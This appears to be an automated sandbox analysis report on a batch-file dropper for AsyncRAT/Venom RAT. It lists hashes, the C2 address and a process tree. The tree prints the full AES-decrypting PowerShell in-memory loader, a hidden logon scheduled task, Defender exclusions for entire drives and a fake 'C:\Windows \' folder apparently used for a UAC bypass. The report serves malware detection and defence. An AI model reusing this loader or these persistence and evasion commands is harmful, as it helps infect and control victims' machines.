Analysis

  • max time kernel
    133s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
  • submitted
    14-09-2024 01:32

General

  • Target

    InjectorStarter.bat

  • Size

    167KB

  • MD5

    46d96a835e60ee73339082c3c7eb62cc

  • SHA1

    b9c668ea33db469cd1ed60bd8d31e5347975a72c

  • SHA256

    c11831adced48656b92417fa594e4037d1f42194cd134fef31f52e6cd4b35d4a

  • SHA512

    ca6705fb45e3712004702d903733cfd0dc91b63d0a41a6bb0531e18bedb6c57de8486f4e27aa8fff66c44acbcf2fad6a3b5267e9b69c144df917105e9c257497

  • SSDEEP

    3072:rKTAIOdL6ZlESFX0Wb8s7CqRa8gZbN8/Z2LfvTijJij6wTKGJWD:tlumcVb8sOqRbgA/Cf8+6Sq

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.2

Botnet

Default

C2

41.216.183.109:4449

Mutex

eqrgkllk45thea

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is written in C# and is designed to remotely monitor and control other computers.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Suspicious behavior: EnumeratesProcesses 38 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\InjectorStarter.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4508
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wGRUA3G1Id5Yrl+/tKZd770scSjou27cv5oSvt7BwaQ='); $aes_var.IV=[System.Convert]::FromBase64String('Y2EA3S2a60w++GUnYA46Lg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GkmdP=New-Object System.IO.MemoryStream(,$param_var); $hiwNw=New-Object System.IO.MemoryStream; $GuFCf=New-Object System.IO.Compression.GZipStream($GkmdP, [IO.Compression.CompressionMode]::Decompress); $GuFCf.CopyTo($hiwNw); $GuFCf.Dispose(); $GkmdP.Dispose(); $hiwNw.Dispose(); $hiwNw.ToArray();}function execute_function($param_var,$param2_var){ $PazRF=[System.Reflection.Assembly]::Load([byte[]]$param_var); $SUZbj=$PazRF.EntryPoint; $SUZbj.Invoke($null, $param2_var);}$ZeAWF = 'C:\Users\Admin\AppData\Local\Temp\InjectorStarter.bat';$host.UI.RawUI.WindowTitle = $ZeAWF;$dobXh=[System.IO.File]::ReadAllText($ZeAWF).Split([Environment]::NewLine);foreach ($YQfVl in $dobXh) { if ($YQfVl.StartsWith('LUChidbwYzZpSAhDIbmN')) { $UhuSz=$YQfVl.Substring(20); break; }}$payloads_var=[string[]]$UhuSz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var 
$null;execute_function $payload3_var (,[string[]] ('')); "
      2⤵
        PID:3616
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:440
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3548
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5100
          • C:\Windows \System32\ComputerDefaults.exe
            "C:\Windows \System32\ComputerDefaults.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2488
            • C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c SC.cmd
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2188
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('wGRUA3G1Id5Yrl+/tKZd770scSjou27cv5oSvt7BwaQ='); $aes_var.IV=[System.Convert]::FromBase64String('Y2EA3S2a60w++GUnYA46Lg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GkmdP=New-Object System.IO.MemoryStream(,$param_var); $hiwNw=New-Object System.IO.MemoryStream; $GuFCf=New-Object System.IO.Compression.GZipStream($GkmdP, [IO.Compression.CompressionMode]::Decompress); $GuFCf.CopyTo($hiwNw); $GuFCf.Dispose(); $GkmdP.Dispose(); $hiwNw.Dispose(); $hiwNw.ToArray();}function execute_function($param_var,$param2_var){ $PazRF=[System.Reflection.Assembly]::Load([byte[]]$param_var); $SUZbj=$PazRF.EntryPoint; $SUZbj.Invoke($null, $param2_var);}$ZeAWF = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $ZeAWF;$dobXh=[System.IO.File]::ReadAllText($ZeAWF).Split([Environment]::NewLine);foreach ($YQfVl in $dobXh) { if ($YQfVl.StartsWith('LUChidbwYzZpSAhDIbmN')) { $UhuSz=$YQfVl.Substring(20); break; }}$payloads_var=[string[]]$UhuSz.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var 
$null;execute_function $payload3_var (,[string[]] ('')); "
                6⤵
                  PID:5012
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                  6⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:4820
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3236
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1296
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
                    7⤵
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1676
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4028
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
                    7⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    PID:232
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
            3⤵
              PID:5032
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\InjectorStarter')
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1712
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2924
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4112

        Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          3f01549ee3e4c18244797530b588dad9

          SHA1

          3e87863fc06995fe4b741357c68931221d6cc0b9

          SHA256

          36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a

          SHA512

          73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

          Filesize

          53KB

          MD5

          a26df49623eff12a70a93f649776dab7

          SHA1

          efb53bd0df3ac34bd119adf8788127ad57e53803

          SHA256

          4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

          SHA512

          e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

          Filesize

          2KB

          MD5

          005bc2ef5a9d890fb2297be6a36f01c2

          SHA1

          0c52adee1316c54b0bfdc510c0963196e7ebb430

          SHA256

          342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

          SHA512

          f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

          Filesize

          2KB

          MD5

          e4de99c1795fd54aa87da05fa39c199c

          SHA1

          dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

          SHA256

          23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

          SHA512

          796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          4373abae4880a277a3859f5734143a19

          SHA1

          a71759a565541fba5e1ee8d3fceee7645ed75054

          SHA256

          f151ef7e7996f479ba2ab9334d50ff36ae85917c4451614a254b121d328eb607

          SHA512

          0af72c0f2ff8716e99a84e67ef4bb921e389459b90f76ca17340384aabcdf41a10c2191801c8d343b649cb547ea8182ca367b7aa6176d7304394be4b9bfe8718

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          81b640502b0c25ab216c6b6ad82ba7bd

          SHA1

          1b43e1fead8428aee3b764bcacc3795021277be9

          SHA256

          4cf92d978f2a1fc5b80eda8a11f181603018d270fc8fe24daa634b954c75380f

          SHA512

          842cfba04ddbd5336e16dbc1ab8e57a80541f0ab1da6260fcca53f7f441e4b1c4149bce2d74b23684a338a86aded2626008f33edb246871e178bda1272c8fa57

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          c4bac001ce1ea76036b69ef6920fffe1

          SHA1

          ce176b38f2ee4b300cbec04592f70b65b45491ed

          SHA256

          2895ccfe721a7d966bb407b4bb713320d3fb11ceb793fcc84a751abb755ca1c6

          SHA512

          e8616fb64a420202573cad3253b5714816b09522c8f466d0a42b77701d911146f501e3ec06e0b7d79f56d42ea2cc25c642ff64f57242bb609db039484b12ddc3

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          721b5709e8cf707b3371e9dcec3f8dbe

          SHA1

          dca34cbf05583bd4ee731e732c0ff993eb4cfd13

          SHA256

          df5a6fc77d68de7db1bc06f5f1f9609fb27df5ee90d57f7766860cb3bef14f43

          SHA512

          ffcdce04c34fe269f898e599b95fff2306f9ab5e68e0255cb4c80cffedf262a0567b563317a94110e9f10467a5a340a71da83d0439b37d9e83ce76c5def8ca3d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          73aa7bac9a76981286ae4d6ac4734b2d

          SHA1

          6deb0456dbe856792c66e803427b599311fdda23

          SHA256

          84397e930607b63ba9cfe6c4a4c472eb66d074526b8fe48d15856bc1a649aba6

          SHA512

          0dcc91f38e59259a4217b27746a66b7a6dec07ade9478fcbdedcd21eecbf584175a2e12d48ea6945ddfa81ee24dd0de17b154225f32aaed7f730bf64474745d9

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          664B

          MD5

          c5a924d29f846b1d81e3c4df6cf310d0

          SHA1

          e0cfbbf4666d649d229322c82ae6c1f3dda6c63a

          SHA256

          a08aca12c8c39b70f38089a2009f7db55afaeb928eda54436a65ebfa9539e66d

          SHA512

          f2a292dbb2c6e37d4adee20a1172f445fbf965dcea89e37827b84eb569a1045ee359267d5e6c7b326dcfbacbd96e410d4b6cdbdcd82a9d359501208415ed1158

        • C:\Users\Admin\AppData\Local\Temp\SC.cmd

          Filesize

          167KB

          MD5

          46d96a835e60ee73339082c3c7eb62cc

          SHA1

          b9c668ea33db469cd1ed60bd8d31e5347975a72c

          SHA256

          c11831adced48656b92417fa594e4037d1f42194cd134fef31f52e6cd4b35d4a

          SHA512

          ca6705fb45e3712004702d903733cfd0dc91b63d0a41a6bb0531e18bedb6c57de8486f4e27aa8fff66c44acbcf2fad6a3b5267e9b69c144df917105e9c257497

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uvwp3lkm.nte.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf

          Filesize

          8B

          MD5

          cf759e4c5f14fe3eec41b87ed756cea8

          SHA1

          c27c796bb3c2fac929359563676f4ba1ffada1f5

          SHA256

          c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761

          SHA512

          c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

        • C:\Windows \System32\ComputerDefaults.exe

          Filesize

          80KB

          MD5

          d25a9e160e3b74ef2242023726f15416

          SHA1

          27a9bb9d7628d442f9b5cf47711c906e3315755b

          SHA256

          7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c

          SHA512

          bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910

        • C:\Windows \System32\MLANG.dll

          Filesize

          103KB

          MD5

          d4f7ff46bb9412b90e8f091f6a9115c3

          SHA1

          e7c82eca0bd2c9969b036efd07bfb6a1e3a342cd

          SHA256

          53493edddf3e4509f791d0e26ea80d8b2283aa95a0f4e263ebb8fc1e7d8d9c82

          SHA512

          7bf7a9424f8540d4f867c53c3042fc91c7c4bf09f8c790d664908c61cce3d32a16fa286fff2d5b9aed3c25f645fdba50a2c91030eea9da1e8e7215c414e32a0d
